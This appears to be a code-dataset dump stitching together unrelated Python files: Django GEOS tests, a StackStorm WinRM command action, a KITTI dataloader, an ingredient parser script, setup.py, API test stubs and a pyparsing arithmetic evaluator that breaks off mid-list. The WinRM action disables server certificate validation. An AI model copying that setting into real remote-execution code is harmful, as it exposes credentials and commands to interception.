        g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
        g1 = g.transform(4326, clone=True)
        self.assertEqual(g1.tuple, g.tuple)
        self.assertEqual(g1.srid, 4326)
        self.assertTrue(g1 is not g, "Clone didn't happen")
    # Repeat the same checks with GDAL support forced off.
    old_has_gdal = gdal.HAS_GDAL
    try:
        gdal.HAS_GDAL = False
        g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
        gt = g.tuple
        g.transform(4326)
        self.assertEqual(g.tuple, gt)
        self.assertEqual(g.srid, 4326)
        g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
        g1 = g.transform(4326, clone=True)
        self.assertEqual(g1.tuple, g.tuple)
        self.assertEqual(g1.srid, 4326)
        self.assertTrue(g1 is not g, "Clone didn't happen")
    finally:
        gdal.HAS_GDAL = old_has_gdal
def test23_transform_nosrid(self):
    """ Testing `transform` method (no SRID or negative SRID) """
    # A geometry without a meaningful SRID cannot be reprojected.
    g = GEOSGeometry('POINT (-104.609 38.255)', srid=None)
    self.assertRaises(GEOSException, g.transform, 2774)
    g = GEOSGeometry('POINT (-104.609 38.255)', srid=None)
    self.assertRaises(GEOSException, g.transform, 2774, clone=True)
    g = GEOSGeometry('POINT (-104.609 38.255)', srid=-1)
    self.assertRaises(GEOSException, g.transform, 2774)
    g = GEOSGeometry('POINT (-104.609 38.255)', srid=-1)
    self.assertRaises(GEOSException, g.transform, 2774, clone=True)
def test23_transform_nogdal(self):
    """ Testing `transform` method (GDAL not available) """
    # Temporarily disable GDAL; transform() must then raise, and the
    # flag must be restored even if an assertion fails.
    old_has_gdal = gdal.HAS_GDAL
    try:
        gdal.HAS_GDAL = False
        g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
        self.assertRaises(GEOSException, g.transform, 2774)
        g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
        self.assertRaises(GEOSException, g.transform, 2774, clone=True)
    finally:
        gdal.HAS_GDAL = old_has_gdal
def test24_extent(self):
    "Testing `extent` method (xmin, ymin, xmax, ymax)."
    # The xmin, ymin, xmax, ymax of the MultiPoint should be returned.
    mp = MultiPoint(Point(5, 23), Point(0, 0), Point(10, 50))
    self.assertEqual((0.0, 0.0, 10.0, 50.0), mp.extent)
    pnt = Point(5.23, 17.8)
    # Extent of points is just the point itself repeated.
    self.assertEqual((5.23, 17.8, 5.23, 17.8), pnt.extent)
    # Testing on the 'real world' Polygon.
    poly = fromstr(self.geometries.polygons[3].wkt)
    ring = poly.shell
    x, y = ring.x, ring.y
    xmin, ymin = min(x), min(y)
    xmax, ymax = max(x), max(y)
    self.assertEqual((xmin, ymin, xmax, ymax), poly.extent)
def test25_pickle(self):
    "Testing pickling and unpickling support."
    # Using both pickle and cPickle -- just 'cause.
    import pickle, cPickle
    # Creating a list of test geometries for pickling,
    # and setting the SRID on some of them.
    def get_geoms(lst, srid=None):
        return [GEOSGeometry(tg.wkt, srid) for tg in lst]
    tgeoms = get_geoms(self.geometries.points)
    tgeoms.extend(get_geoms(self.geometries.multilinestrings, 4326))
    tgeoms.extend(get_geoms(self.geometries.polygons, 3084))
    tgeoms.extend(get_geoms(self.geometries.multipolygons, 900913))
    # The SRID won't be exported in GEOS 3.0 release candidates.
    no_srid = self.null_srid == -1
    for geom in tgeoms:
        s1, s2 = cPickle.dumps(geom), pickle.dumps(geom)
        g1, g2 = cPickle.loads(s1), pickle.loads(s2)
        for tmpg in (g1, g2):
            self.assertEqual(geom, tmpg)
            # Only check SRID round-tripping when the build preserves it.
            if not no_srid: self.assertEqual(geom.srid, tmpg.srid)
def test26_prepared(self):
    "Testing PreparedGeometry support."
    # Prepared geometries require GEOS >= 3.1.
    if not GEOS_PREPARE: return
    # Creating a simple multipolygon and getting a prepared version.
    mpoly = GEOSGeometry('MULTIPOLYGON(((0 0,0 5,5 5,5 0,0 0)),((5 5,5 10,10 10,10 5,5 5)))')
    prep = mpoly.prepared
    # A set of test points.
    pnts = [Point(5, 5), Point(7.5, 7.5), Point(2.5, 7.5)]
    covers = [True, True, False] # No `covers` op for regular GEOS geoms.
    for pnt, c in zip(pnts, covers):
        # Results should be the same (but faster)
        self.assertEqual(mpoly.contains(pnt), prep.contains(pnt))
        self.assertEqual(mpoly.intersects(pnt), prep.intersects(pnt))
        self.assertEqual(c, prep.covers(pnt))
def test26_line_merge(self):
    """Testing line merge support.

    NOTE(review): the method name repeats the `test26_` prefix used by
    the previous test; both still run, but the numbering is misleading.
    """
    ref_geoms = (fromstr('LINESTRING(1 1, 1 1, 3 3)'),
                 fromstr('MULTILINESTRING((1 1, 3 3), (3 3, 4 2))'),
                 )
    ref_merged = (fromstr('LINESTRING(1 1, 3 3)'),
                  fromstr('LINESTRING (1 1, 3 3, 4 2)'),
                  )
    for geom, merged in zip(ref_geoms, ref_merged):
        self.assertEqual(merged, geom.merged)
def test27_valid_reason(self):
    "Testing IsValidReason support"
    # Skipping tests if GEOS < v3.1.
    if not GEOS_PREPARE: return
    g = GEOSGeometry("POINT(0 0)")
    self.assertTrue(g.valid)
    self.assertTrue(isinstance(g.valid_reason, basestring))
    self.assertEqual(g.valid_reason, "Valid Geometry")
    # The degenerate linestring below makes GEOS emit a notice on stderr;
    # bracket it so test output is not mistaken for a failure.
    print("\nBEGIN - expecting GEOS_NOTICE; safe to ignore.\n")
    g = GEOSGeometry("LINESTRING(0 0, 0 0)")
    self.assertTrue(not g.valid)
    self.assertTrue(isinstance(g.valid_reason, basestring))
    self.assertTrue(g.valid_reason.startswith("Too few points in geometry component"))
    print("\nEND - expecting GEOS_NOTICE; safe to ignore.\n")
def test28_geos_version(self):
    "Testing the GEOS version regular expression."
    from django.contrib.gis.geos.libgeos import version_regex
    # (raw version string, expected parsed version) pairs.
    versions = [ ('3.0.0rc4-CAPI-1.3.3', '3.0.0'),
                 ('3.0.0-CAPI-1.4.1', '3.0.0'),
                 ('3.4.0dev-CAPI-1.8.0', '3.4.0') ]
    for v, expected in versions:
        m = version_regex.match(v)
        self.assertTrue(m)
        self.assertEqual(m.group('version'), expected)
def suite():
    """Build and return a TestSuite containing all GEOSTest cases."""
    s = unittest.TestSuite()
    s.addTest(unittest.makeSuite(GEOSTest))
    return s
def run(verbosity=2):
    """Run the GEOS test suite with a text test runner."""
    unittest.TextTestRunner(verbosity=verbosity).run(suite())
| 40.993184
| 121
| 0.589287
|
4a04d186693ce004c4d673386d0582c0ab745e4e
| 982
|
py
|
Python
|
packs/windows/actions/winrm_cmd.py
|
userlocalhost2000/st2contrib
|
1a5f759e76401743ed9023d298a3d767e3885db1
|
[
"Apache-2.0"
] | 164
|
2015-01-17T16:08:33.000Z
|
2021-08-03T02:34:07.000Z
|
packs/windows/actions/winrm_cmd.py
|
userlocalhost2000/st2contrib
|
1a5f759e76401743ed9023d298a3d767e3885db1
|
[
"Apache-2.0"
] | 442
|
2015-01-01T11:19:01.000Z
|
2017-09-06T23:26:17.000Z
|
packs/windows/actions/winrm_cmd.py
|
userlocalhost2000/st2contrib
|
1a5f759e76401743ed9023d298a3d767e3885db1
|
[
"Apache-2.0"
] | 202
|
2015-01-13T00:37:40.000Z
|
2020-11-07T11:30:10.000Z
|
from winrm.protocol import Protocol
from st2actions.runners.pythonrunner import Action
__all__ = [
'WinRMCmdAction'
]
class WinRMCmdAction(Action):
    """StackStorm action that executes a command on a Windows host via WinRM."""

    def run(self, host, password, command, params, username='Administrator',
            port=5732, secure=True):
        """Open a WinRM shell, run ``command`` with ``params``, return its output.

        NOTE(review): the default ``port=5732`` is unusual -- WinRM
        conventionally listens on 5985 (HTTP) / 5986 (HTTPS).  The default
        is kept for backward compatibility; confirm against deployments.

        :return: dict with ``stdout``, ``stderr`` and ``return_code``
                 (the exit code was previously discarded).
        """
        proto = 'https' if secure else 'http'
        p = Protocol(
            endpoint='%s://%s:%i/wsman' % (proto, host, port),  # RFC 2732?
            transport='ntlm',
            username=username,
            password=password,
            server_cert_validation='ignore')
        shell_id = p.open_shell()
        try:
            # Run the command and collect its output streams and exit code.
            command_id = p.run_command(shell_id, command, params)
            std_out, std_err, status_code = p.get_command_output(shell_id,
                                                                 command_id)
            p.cleanup_command(shell_id, command_id)
        finally:
            # Always release the remote shell, even if the command errors,
            # so shells are not leaked on the Windows host.
            p.close_shell(shell_id)
        return {'stdout': std_out, 'stderr': std_err,
                'return_code': status_code}
| 32.733333
| 77
| 0.57332
|
4a04d1bdb1889a3e34b24add11b629884f782152
| 1,305
|
py
|
Python
|
Kitti_loader/kitti_dataset/data_loader.py
|
Jonas-LUOJIAN/KITTI-DepthCompletion-DataLoader
|
499ed92834c77c8c4f74dc3c057d4d4bd6bc7b51
|
[
"MIT"
] | 1
|
2021-12-17T12:26:24.000Z
|
2021-12-17T12:26:24.000Z
|
Kitti_loader/kitti_dataset/data_loader.py
|
Jonas-LUOJIAN/KITTI-DepthCompletion-DataLoader
|
499ed92834c77c8c4f74dc3c057d4d4bd6bc7b51
|
[
"MIT"
] | null | null | null |
Kitti_loader/kitti_dataset/data_loader.py
|
Jonas-LUOJIAN/KITTI-DepthCompletion-DataLoader
|
499ed92834c77c8c4f74dc3c057d4d4bd6bc7b51
|
[
"MIT"
] | null | null | null |
from kitti_dataset.kitti_loader import Kitti_dataset, Kitti_Dataset
from torch.utils.data import DataLoader
import random
# dataset_path = "D:/kitti"
# kitti = Kitti_dataset(dataset_path)
# print(kitti.train_paths)
# kitti.read_kitti_from_local()
#
# kitti_train = Kitti_Dataset(kitti.train_paths, transform=True)
# kitti_val = Kitti_Dataset(kitti.val_paths)
# kitti_selection = Kitti_Dataset(kitti.selected_paths)
# kitti_test = Kitti_Dataset(kitti.test_files)
def get_loader(kitti_train, kitti_val, kitti_selection, batch_size=5):
    """Build the train / validation / selection dataloaders.

    All three loaders share ``batch_size``, pinned memory and
    ``drop_last``; only shuffling and worker count differ per split.
    """
    shared = dict(batch_size=batch_size, pin_memory=True, drop_last=True)
    train_loader = DataLoader(kitti_train, sampler=None, shuffle=True,
                              num_workers=8, **shared)
    val_loader = DataLoader(kitti_val, sampler=None, shuffle=True,
                            num_workers=0, **shared)
    val_selection_loader = DataLoader(kitti_selection, shuffle=False,
                                      num_workers=0, **shared)
    return train_loader, val_loader, val_selection_loader
# train_loader, val_loader, val_selection_loader = get_loader(kitti_train, kitti_val, kitti_selection)
| 36.25
| 103
| 0.737931
|
4a04d295a72c2424fd2e0d9129f96492e37146ca
| 825
|
py
|
Python
|
bin/parse-ingredient-text.py
|
tiger1021/ingredient-phrase-tagger
|
71fba65aa99eacb9860bb9eeee6409236c10f0e1
|
[
"Apache-2.0"
] | null | null | null |
bin/parse-ingredient-text.py
|
tiger1021/ingredient-phrase-tagger
|
71fba65aa99eacb9860bb9eeee6409236c10f0e1
|
[
"Apache-2.0"
] | null | null | null |
bin/parse-ingredient-text.py
|
tiger1021/ingredient-phrase-tagger
|
71fba65aa99eacb9860bb9eeee6409236c10f0e1
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
"""Parse ingredient text (from argv) with a trained CRF model and print JSON."""
from __future__ import print_function

import sys
import os
import tempfile
import StringIO
import json
import subprocess

from ingredient_phrase_tagger.training import utils

if len(sys.argv) < 2:
    sys.stderr.write('Usage: parse-ingredients.py TEXT')
    sys.exit(1)

text = sys.argv[1]

# Write the CRF-formatted input to a temporary file for crf_test.
_, tmpFile = tempfile.mkstemp()
string_file = StringIO.StringIO(text)
with open(tmpFile, "wt") as text_file:
    text_file.write(utils.export_data(string_file.readlines()))

tmpFilePath = "../tmp/model_file"
modelFilename = os.path.join(os.path.dirname(__file__), tmpFilePath)
try:
    results = StringIO.StringIO(
        subprocess.check_output(
            ["crf_test", "-v", "1", "-m", modelFilename, tmpFile]))
finally:
    # was: os.system("rm %s" % tmpFile) -- non-portable and shell-injection
    # prone; remove directly and even when crf_test fails.
    os.remove(tmpFile)

results_json = (json.dumps(utils.import_data(results), indent=4))
print(results_json)
| 23.571429
| 107
| 0.753939
|
4a04d2f43285c142f805c78a0d42021b4dbef0a8
| 1,801
|
py
|
Python
|
setup.py
|
HopeLapointe/fieldbioinformatics
|
c67295329b56a1bec0ae11ec0d12275a23badf54
|
[
"MIT"
] | null | null | null |
setup.py
|
HopeLapointe/fieldbioinformatics
|
c67295329b56a1bec0ae11ec0d12275a23badf54
|
[
"MIT"
] | null | null | null |
setup.py
|
HopeLapointe/fieldbioinformatics
|
c67295329b56a1bec0ae11ec0d12275a23badf54
|
[
"MIT"
] | null | null | null |
import os
from setuptools import setup

# Read the package version from artic/version.py without importing the
# package (avoids pulling in its runtime dependencies at install time).
# `with` closes the handle (the original leaked an open file object).
version_py = os.path.join(os.path.dirname(__file__), 'artic', 'version.py')
with open(version_py) as version_file:
    version = version_file.read().strip().split(
        '=')[-1].replace('"', '').strip()

long_description = """
``artic`` is a pipeline for working with virus sequencing data sequenced with nanopore
"""

HERE = os.path.dirname(__file__)

# Install requirements are pinned in requirements.txt, one per line.
with open(os.path.join(HERE, "requirements.txt"), "r") as f:
    install_requires = [x.strip() for x in f.readlines()]

setup(
    name="artic",
    version=version,
    install_requires=install_requires,
    requires=['python (>=3.5)'],
    packages=['artic'],
    author="Nick Loman",
    description='A toolset for working with nanopore sequencing data',
    long_description=long_description,
    url="https://artic.network/ncov-2019/ncov2019-bioinformatics-sop.html",
    package_dir={'artic': "artic"},
    package_data={'artic': []},
    zip_safe=False,
    include_package_data=True,
    entry_points={
        'console_scripts': [
            'artic=artic.pipeline:main',
            'align_trim=artic.align_trim:main',
            'align_trim_n=artic.align_trim_n:main',
            'margin_cons=artic.margin_cons:main',
            'margin_cons_medaka=artic.margin_cons_medaka:main',
            'vcfextract=artic.vcfextract:main',
            'artic_vcf_merge=artic.vcf_merge:main',
            'artic_vcf_filter=artic.vcf_filter:main',
            'artic_make_depth_mask=artic.make_depth_mask:main',
            'artic_fasta_header=artic.fasta_header:main'
        ],
    },
    author_email="n.j.loman@bham.ac.uk",
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Science/Research',
        'License :: OSI Approved :: MIT',
        'Topic :: Scientific/Engineering :: Bio-Informatics'
    ]
)
| 34.634615
| 86
| 0.649084
|
4a04d2f761d22a62a0286e2ec724c0ed67ce8031
| 3,416
|
py
|
Python
|
test/test_derived_metric_api.py
|
mdennehy/python-client
|
4d9cfa32075a6a65d88a38fe9e72b282e87b8808
|
[
"Apache-2.0"
] | null | null | null |
test/test_derived_metric_api.py
|
mdennehy/python-client
|
4d9cfa32075a6a65d88a38fe9e72b282e87b8808
|
[
"Apache-2.0"
] | null | null | null |
test/test_derived_metric_api.py
|
mdennehy/python-client
|
4d9cfa32075a6a65d88a38fe9e72b282e87b8808
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Wavefront REST API
<p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer <<API-TOKEN>>\" to your HTTP requests.</p> # noqa: E501
OpenAPI spec version: v2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import wavefront_api_client
from wavefront_api_client.api.derived_metric_api import DerivedMetricApi # noqa: E501
from wavefront_api_client.rest import ApiException
class TestDerivedMetricApi(unittest.TestCase):
    """DerivedMetricApi unit test stubs.

    Auto-generated by swagger-codegen; every test body is an intentional
    placeholder (``pass``) to be filled in with real assertions.
    """

    def setUp(self):
        # Fresh API client for each test.
        self.api = wavefront_api_client.api.derived_metric_api.DerivedMetricApi()  # noqa: E501

    def tearDown(self):
        pass

    def test_add_tag_to_derived_metric(self):
        """Test case for add_tag_to_derived_metric

        Add a tag to a specific Derived Metric  # noqa: E501
        """
        pass

    def test_create_derived_metric(self):
        """Test case for create_derived_metric

        Create a specific derived metric definition  # noqa: E501
        """
        pass

    def test_delete_derived_metric(self):
        """Test case for delete_derived_metric

        Delete a specific derived metric definition  # noqa: E501
        """
        pass

    def test_get_all_derived_metrics(self):
        """Test case for get_all_derived_metrics

        Get all derived metric definitions for a customer  # noqa: E501
        """
        pass

    def test_get_derived_metric(self):
        """Test case for get_derived_metric

        Get a specific registered query  # noqa: E501
        """
        pass

    def test_get_derived_metric_by_version(self):
        """Test case for get_derived_metric_by_version

        Get a specific historical version of a specific derived metric definition  # noqa: E501
        """
        pass

    def test_get_derived_metric_history(self):
        """Test case for get_derived_metric_history

        Get the version history of a specific derived metric definition  # noqa: E501
        """
        pass

    def test_get_derived_metric_tags(self):
        """Test case for get_derived_metric_tags

        Get all tags associated with a specific derived metric definition  # noqa: E501
        """
        pass

    def test_remove_tag_from_derived_metric(self):
        """Test case for remove_tag_from_derived_metric

        Remove a tag from a specific Derived Metric  # noqa: E501
        """
        pass

    def test_set_derived_metric_tags(self):
        """Test case for set_derived_metric_tags

        Set all tags associated with a specific derived metric definition  # noqa: E501
        """
        pass

    def test_undelete_derived_metric(self):
        """Test case for undelete_derived_metric

        Undelete a specific derived metric definition  # noqa: E501
        """
        pass

    def test_update_derived_metric(self):
        """Test case for update_derived_metric

        Update a specific derived metric definition  # noqa: E501
        """
        pass
if __name__ == '__main__':
unittest.main()
| 28.705882
| 409
| 0.679157
|
4a04d41ebd60c8f9a623a91b07f9ccffab4035a1
| 657
|
py
|
Python
|
models/__init__.py
|
ChenWang8750/WTAM_net
|
b5c01b9ebc2514cf6fc8ce45c0944b79f0c2a54d
|
[
"MIT"
] | 4
|
2021-07-12T23:28:21.000Z
|
2021-07-25T02:16:50.000Z
|
models/__init__.py
|
ChenWang8750/WTAM_net
|
b5c01b9ebc2514cf6fc8ce45c0944b79f0c2a54d
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
ChenWang8750/WTAM_net
|
b5c01b9ebc2514cf6fc8ce45c0944b79f0c2a54d
|
[
"MIT"
] | null | null | null |
def create_model(opt):
    """Instantiate and initialize the network selected by ``opt.model``.

    Raises ``ValueError`` for an unrecognized model name.  Imports are
    kept local so only the selected model's module is loaded.
    """
    model = None
    print(opt.model)
    aligned_modes = ('aligned', 'aligned_resized')
    if opt.model == 'MuFA_Net':
        assert opt.dataset_mode in aligned_modes
        from models.net_models.MuFANet_model import MuFANetModel
        model = MuFANetModel()
    elif opt.model == 'WTAM':
        assert opt.dataset_mode in aligned_modes
        from models.net_models.WTAM_model import WTAMModel
        model = WTAMModel()
    else:
        raise ValueError("Model [%s] not recognized." % opt.model)
    model.initialize(opt)
    print("model [%s] was created" % (model.name()))
    return model
| 34.578947
| 87
| 0.648402
|
4a04d51ba9098f83a85822c0ec308c1aaf932cf1
| 2,729
|
py
|
Python
|
colour/volume/tests/test_macadam_limits.py
|
rift-labs-developer/colour
|
15112dbe824aab0f21447e0db4a046a28a06f43a
|
[
"BSD-3-Clause"
] | 1,380
|
2015-01-10T12:30:33.000Z
|
2022-03-30T10:19:57.000Z
|
colour/volume/tests/test_macadam_limits.py
|
rift-labs-developer/colour
|
15112dbe824aab0f21447e0db4a046a28a06f43a
|
[
"BSD-3-Clause"
] | 638
|
2015-01-02T10:49:05.000Z
|
2022-03-29T10:16:22.000Z
|
colour/volume/tests/test_macadam_limits.py
|
rift-labs-developer/colour
|
15112dbe824aab0f21447e0db4a046a28a06f43a
|
[
"BSD-3-Clause"
] | 250
|
2015-01-21T15:27:19.000Z
|
2022-03-30T10:23:58.000Z
|
# -*- coding: utf-8 -*-
"""
Defines the unit tests for the :mod:`colour.volume.macadam_limits` module.
"""
import numpy as np
import unittest
from itertools import permutations
from colour.volume import is_within_macadam_limits
from colour.utilities import ignore_numpy_errors
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2021 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = 'colour-developers@colour-science.org'
__status__ = 'Production'
__all__ = ['TestIsWithinMacadamLimits']
class TestIsWithinMacadamLimits(unittest.TestCase):
    """
    Defines :func:`colour.volume.macadam_limits.is_within_macadam_limits`
    definition unit tests methods.
    """

    def test_is_within_macadam_limits(self):
        """
        Tests :func:`colour.volume.macadam_limits.is_within_macadam_limits`
        definition.
        """

        # Points inside / outside the limits for illuminants 'A' and 'C'.
        self.assertTrue(
            is_within_macadam_limits(np.array([0.3205, 0.4131, 0.5100]), 'A'))

        self.assertFalse(
            is_within_macadam_limits(np.array([0.0005, 0.0031, 0.0010]), 'A'))

        self.assertTrue(
            is_within_macadam_limits(np.array([0.4325, 0.3788, 0.1034]), 'C'))

        self.assertFalse(
            is_within_macadam_limits(np.array([0.0025, 0.0088, 0.0340]), 'C'))

    def test_n_dimensional_is_within_macadam_limits(self):
        """
        Tests :func:`colour.volume.macadam_limits.is_within_macadam_limits`
        definition n-dimensional arrays support.
        """

        # The result must broadcast consistently across tiled/reshaped input.
        a = np.array([0.3205, 0.4131, 0.5100])
        b = is_within_macadam_limits(a, 'A')

        a = np.tile(a, (6, 1))
        b = np.tile(b, 6)
        np.testing.assert_almost_equal(is_within_macadam_limits(a, 'A'), b)

        a = np.reshape(a, (2, 3, 3))
        b = np.reshape(b, (2, 3))
        np.testing.assert_almost_equal(is_within_macadam_limits(a, 'A'), b)

    def test_raise_exception_is_within_macadam_limits(self):
        """
        Tests :func:`colour.volume.macadam_limits.is_within_macadam_limits`
        definition raised exception.
        """

        # 'B' is not a supported illuminant key.
        self.assertRaises(KeyError, is_within_macadam_limits,
                          np.array([0.3205, 0.4131, 0.5100]), 'B')

    @ignore_numpy_errors
    def test_nan_is_within_macadam_limits(self):
        """
        Tests :func:`colour.volume.macadam_limits.is_within_macadam_limits`
        definition nan support.
        """

        # Exercise every permutation of extreme/NaN inputs; the call must
        # not raise (numpy warnings are suppressed by the decorator).
        cases = [-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]
        cases = set(permutations(cases * 3, r=3))
        for case in cases:
            is_within_macadam_limits(case, 'A')
if __name__ == '__main__':
unittest.main()
| 31.011364
| 78
| 0.652986
|
4a04d6f0ee0194532abd1a2bc453b13410755aab
| 325
|
py
|
Python
|
Codes/Math/perfect_number.py
|
datta-agni/python-codes
|
d902d0aaf23d2ea4b60ed7ecab0d593e3334c23b
|
[
"MIT"
] | null | null | null |
Codes/Math/perfect_number.py
|
datta-agni/python-codes
|
d902d0aaf23d2ea4b60ed7ecab0d593e3334c23b
|
[
"MIT"
] | null | null | null |
Codes/Math/perfect_number.py
|
datta-agni/python-codes
|
d902d0aaf23d2ea4b60ed7ecab0d593e3334c23b
|
[
"MIT"
] | null | null | null |
def perfect_number(number: int) -> bool:
    """Return True if *number* equals the sum of its proper divisors.

    Fixes two defects of the original: it returned True for 0 (the empty
    divisor sum, 0, compared equal to 0), and it shadowed the builtin
    ``sum``.
    """
    if number < 1:
        # 0 and negatives are never perfect numbers.
        return False
    divisor_sum = 0
    for candidate in range(1, number):
        if number % candidate == 0:
            divisor_sum += candidate
    return divisor_sum == number
if __name__ == "__main__":
    # Interactive entry point: read an integer from stdin and report
    # whether it is a perfect number.
    print(
        perfect_number(
            int(input("Enter the number to check for perfect number : "))
        )
    )
| 21.666667
| 73
| 0.510769
|
4a04d8d85f77a8d7f657e505ececdd24908bbec2
| 7,104
|
py
|
Python
|
examples/eval_arith.py
|
schlichtanders/pyparsing-2.0.3-OrderedDict
|
50bb1a10b63ac623ef58ffa3ee59bb08be172ff4
|
[
"MIT"
] | null | null | null |
examples/eval_arith.py
|
schlichtanders/pyparsing-2.0.3-OrderedDict
|
50bb1a10b63ac623ef58ffa3ee59bb08be172ff4
|
[
"MIT"
] | null | null | null |
examples/eval_arith.py
|
schlichtanders/pyparsing-2.0.3-OrderedDict
|
50bb1a10b63ac623ef58ffa3ee59bb08be172ff4
|
[
"MIT"
] | null | null | null |
# eval_arith.py
#
# Copyright 2009, 2011 Paul McGuire
#
# Expansion on the pyparsing example simpleArith.py, to include evaluation
# of the parsed tokens.
#
# Added support for exponentiation, using right-to-left evaluation of
# operands
#
from pyparsingOD import Word, nums, alphas, Combine, oneOf, \
opAssoc, operatorPrecedence, Literal
class EvalConstant(object):
    """Evaluate a parsed constant or variable token."""

    # Shared symbol table mapping variable names to their numeric values.
    vars_ = {}

    def __init__(self, tokens):
        self.value = tokens[0]

    def eval(self):
        # A known variable name wins; anything else must parse as a number.
        try:
            return EvalConstant.vars_[self.value]
        except KeyError:
            return float(self.value)
class EvalSignOp(object):
    """Evaluate an expression with a leading unary '+' or '-' sign."""

    def __init__(self, tokens):
        self.sign, self.value = tokens[0]

    def eval(self):
        # Map the sign character to a multiplier, exactly as the grammar
        # guarantees only '+' or '-' can appear here.
        multiplier = -1 if self.sign == '-' else 1
        return multiplier * self.value.eval()
def operatorOperands(tokenlist):
    """Yield (operator, operand) pairs from an alternating token list.

    A trailing unpaired token is silently dropped, matching the original
    StopIteration-based pairing.
    """
    it = iter(tokenlist)
    # zip pulls from the same iterator twice per step -> pairwise grouping.
    for pair in zip(it, it):
        yield pair
class EvalPowerOp(object):
    """Evaluate exponentiation expressions (right-associative).

    The original docstring said "multiplication and division" -- a
    copy-paste slip; this class folds '**' chains right-to-left so that
    a ** b ** c == a ** (b ** c).
    """

    def __init__(self, tokens):
        self.value = tokens[0]

    def eval(self):
        operands = self.value[::2]          # every other token; skips '**'
        result = operands[-1].eval()
        for operand in reversed(operands[:-1]):
            result = operand.eval() ** result
        return result
class EvalMultOp(object):
    """Evaluate multiplication and division expressions (left-associative)."""

    def __init__(self, tokens):
        self.value = tokens[0]

    def eval(self):
        result = self.value[0].eval()
        # Walk the remaining (operator, operand) pairs left to right;
        # a trailing unpaired token (which the grammar never produces)
        # is ignored, matching the original pairing helper.
        rest = self.value[1:]
        for i in range(0, len(rest) - 1, 2):
            op, operand = rest[i], rest[i + 1]
            if op == '*':
                result *= operand.eval()
            elif op == '/':
                result /= operand.eval()
        return result
class EvalAddOp(object):
    """Evaluate addition and subtraction expressions (left-associative)."""

    def __init__(self, tokens):
        self.value = tokens[0]

    def eval(self):
        # Accumulate left to right over (operator, operand) pairs.
        # Renamed the accumulator: the original shadowed the builtin ``sum``.
        total = self.value[0].eval()
        rest = self.value[1:]
        for i in range(0, len(rest) - 1, 2):
            op, operand = rest[i], rest[i + 1]
            if op == '+':
                total += operand.eval()
            elif op == '-':
                total -= operand.eval()
        return total
class EvalComparisonOp(object):
    """Evaluate chained comparison expressions (e.g. ``0 LE A LT 10``)."""

    # Both symbolic and FORTRAN-style operator spellings map to the same
    # two-argument predicates.
    opMap = {
        "<": lambda a, b: a < b,
        "<=": lambda a, b: a <= b,
        ">": lambda a, b: a > b,
        ">=": lambda a, b: a >= b,
        "!=": lambda a, b: a != b,
        "=": lambda a, b: a == b,
        "LT": lambda a, b: a < b,
        "LE": lambda a, b: a <= b,
        "GT": lambda a, b: a > b,
        "GE": lambda a, b: a >= b,
        "NE": lambda a, b: a != b,
        "EQ": lambda a, b: a == b,
        "<>": lambda a, b: a != b,
    }

    def __init__(self, tokens):
        self.value = tokens[0]

    def eval(self):
        # Chained semantics: every adjacent pair must satisfy its operator,
        # with the right operand of one comparison feeding the next.
        left = self.value[0].eval()
        rest = self.value[1:]
        for i in range(0, len(rest) - 1, 2):
            compare = EvalComparisonOp.opMap[rest[i]]
            right = rest[i + 1].eval()
            if not compare(left, right):
                return False
            left = right
        return True
# define the parser
# NOTE(review): Word/Combine/oneOf/Literal/operatorPrecedence/opAssoc come
# from pyparsing, imported earlier in the file (outside this excerpt).
integer = Word(nums)
real = Combine(Word(nums) + "." + Word(nums))
# Variables are restricted to single letters (A, B, ..., J in the demo).
variable = Word(alphas,exact=1)
operand = real | integer | variable
signop = oneOf('+ -')
multop = oneOf('* /')
plusop = oneOf('+ -')
expop = Literal('**')
# use parse actions to attach EvalXXX constructors to sub-expressions
operand.setParseAction(EvalConstant)
# Precedence, tightest binding first: unary sign, exponentiation,
# multiplication/division, addition/subtraction.
arith_expr = operatorPrecedence(operand,
    [
     (signop, 1, opAssoc.RIGHT, EvalSignOp),
     (expop, 2, opAssoc.LEFT, EvalPowerOp),
     (multop, 2, opAssoc.LEFT, EvalMultOp),
     (plusop, 2, opAssoc.LEFT, EvalAddOp),
    ])
# Comparison operators accept both symbolic and FORTRAN-style spellings.
comparisonop = oneOf("< <= > >= != = <> LT GT LE GE EQ NE")
comp_expr = operatorPrecedence(arith_expr,
    [
     (comparisonop, 2, opAssoc.LEFT, EvalComparisonOp),
    ])
def main():
    """Self-test for the safe expression evaluator.

    Each sample rule is parsed with ``comp_expr`` and evaluated through the
    EvalXXX node classes; the result is checked against Python's own
    ``eval()`` of an equivalent expression as the reference.
    """
    # sample expressions posted on comp.lang.python, asking for advice
    # in safely evaluating them
    rules=[
        '( A - B ) = 0',
        '(A + B + C + D + E + F + G + H + I) = J',
        '(A + B + C + D + E + F + G + H) = I',
        '(A + B + C + D + E + F) = G',
        '(A + B + C + D + E) = (F + G + H + I + J)',
        '(A + B + C + D + E) = (F + G + H + I)',
        '(A + B + C + D + E) = F',
        '(A + B + C + D) = (E + F + G + H)',
        '(A + B + C) = (D + E + F)',
        '(A + B) = (C + D + E + F)',
        '(A + B) = (C + D)',
        '(A + B) = (C - D + E - F - G + H + I + J)',
        '(A + B) = C',
        '(A + B) = 0',
        '(A+B+C+D+E) = (F+G+H+I+J)',
        '(A+B+C+D) = (E+F+G+H)',
        '(A+B+C+D)=(E+F+G+H)',
        '(A+B+C)=(D+E+F)',
        '(A+B)=(C+D)',
        '(A+B)=C',
        '(A-B)=C',
        '(A/(B+C))',
        '(B/(C+D))',
        '(G + H) = I',
        '-0.99 LE ((A+B+C)-(D+E+F+G)) LE 0.99',
